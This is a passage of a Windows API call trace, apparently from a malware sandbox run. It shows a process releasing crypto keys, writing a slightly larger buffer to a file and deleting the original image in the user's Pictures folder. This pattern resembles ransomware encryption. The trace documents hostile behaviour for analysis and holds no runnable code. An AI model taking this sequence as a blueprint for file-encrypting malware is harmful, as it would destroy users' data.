lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.588] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.588] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.589] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.589] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.589] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.589] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.589] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.589] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.589] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.589] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.589] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.589] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.589] WriteFile (in: hFile=0x4dc, lpBuffer=0x2aa2e40*, nNumberOfBytesToWrite=0x1098, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aa2e40*, lpNumberOfBytesWritten=0x8cf5e4*=0x1098, lpOverlapped=0x0) returned 1 [0209.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.590] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0209.590] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.590] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0209.591] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.591] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.591] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.591] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.591] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.591] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.591] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.591] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab050, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0209.591] CryptDestroyKey (hKey=0x9e2078) returned 1 [0209.591] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.591] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.591] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.591] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.591] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.591] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.591] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.591] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.591] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.591] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.591] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.591] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.592] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.592] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.592] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.592] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.592] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.592] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.592] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.592] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.592] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.592] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.592] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.592] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.592] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.592] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.592] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.592] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.592] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.592] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.592] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.592] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.592] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.592] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.592] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.593] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.593] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.593] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.593] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.593] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.593] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.593] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.593] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.593] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.593] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.593] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.593] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.593] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.593] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.593] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.593] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.593] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7200, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0209.593] CryptReleaseContext (hProv=0xa7ca18, dwFlags=0x0) returned 1 [0209.593] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.593] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.594] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.594] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.594] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.594] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.594] FreeLibrary (hLibModule=0x76390000) returned 1 [0209.594] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.594] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.594] CloseHandle (hObject=0x520) returned 1 [0209.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.595] CloseHandle (hObject=0x4dc) returned 1 [0209.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.597] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.597] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.597] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.597] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/D7Vw ag.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\D7Vw ag.jpg", lpFilePart=0x8cedf4*="D7Vw ag.jpg") returned 0x24 [0209.597] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\D7Vw ag.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\d7vw ag.jpg")) returned 0x20 [0209.597] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\D7Vw ag.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37829d30, ftCreationTime.dwHighDateTime=0x1d5c96e, ftLastAccessTime.dwLowDateTime=0xff4560a0, ftLastAccessTime.dwHighDateTime=0x1d5d332, ftLastWriteTime.dwLowDateTime=0xff4560a0, ftLastWriteTime.dwHighDateTime=0x1d5d332, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="D7Vw ag.jpg", cAlternateFileName="D7VWAG~1.JPG")) returned 0x9e1bf8 [0209.597] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\D7Vw ag.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\d7vw ag.jpg")) returned 1 [0209.599] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37829d30, ftCreationTime.dwHighDateTime=0x1d5c96e, ftLastAccessTime.dwLowDateTime=0xff4560a0, ftLastAccessTime.dwHighDateTime=0x1d5d332, ftLastWriteTime.dwLowDateTime=0xff4560a0, ftLastWriteTime.dwHighDateTime=0x1d5d332, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="D7Vw ag.jpg", cAlternateFileName="D7VWAG~1.JPG")) returned 0 [0209.599] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0209.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.599] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0209.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0209.600] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.600] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0209.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4a) returned 0x29eb3c8 [0209.601] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/D7Vw ag.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\D7Vw ag.jpg", lpFilePart=0x8cf650*="D7Vw ag.jpg") returned 0x24 [0209.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb3c8 | out: hHeap=0x2af0000) returned 1 [0209.602] GetFileAttributesW 